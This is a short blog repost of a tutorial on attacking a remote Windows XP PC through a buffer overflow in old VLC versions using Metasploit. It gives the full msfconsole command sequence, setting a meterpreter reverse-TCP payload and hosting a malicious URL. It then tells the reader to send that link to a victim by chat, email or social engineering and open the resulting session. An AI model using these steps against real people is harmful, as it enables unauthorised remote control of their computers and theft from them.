lunes, 26 de enero de 2015

How to Attacking on Remote PC using VLC Media Player Exploit

VLC MMS Stream Handling Buffer Overflow
This module exploits a buffer overflow in VLC media player VLC media player prior to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result in a stack buffer overflow when handling a malicious MMS URI. This module uses the browser as attack vector. A specially crafted MMS URI is used to trigger the overflow and get flow control through SEH overwrite. Control is transferred to code located in the heap through a standard heap spray. The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.
Exploit Targets
VLC media player 2.0.0
Internet Explorer 6 on XP SP2
Internet Explorer 7 on XP SP2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/vlc_mms_bof
Msf exploit (vlc_mms_bof)>set payload windows/meterpreter/reverse_tcp
Msf exploit (vlc_mms_bof)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (vlc_mms_bof)>set srvhost 192.168.1.3 (This must be an address on the local machine)
Msf exploit (vlc_mms_bof)>set uripath vlcmms (The Url to use for this exploit)
Msf exploit (vlc_mms_bof)>exploit
Now an URL you should give to your victim http://192.168.1.3:8080/vlcmms
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Fuente: http://www.hackingarticles.in/how-to-attacking-on-remote-pc-using-vlc-media-player-exploit/

No hay comentarios:

Publicar un comentario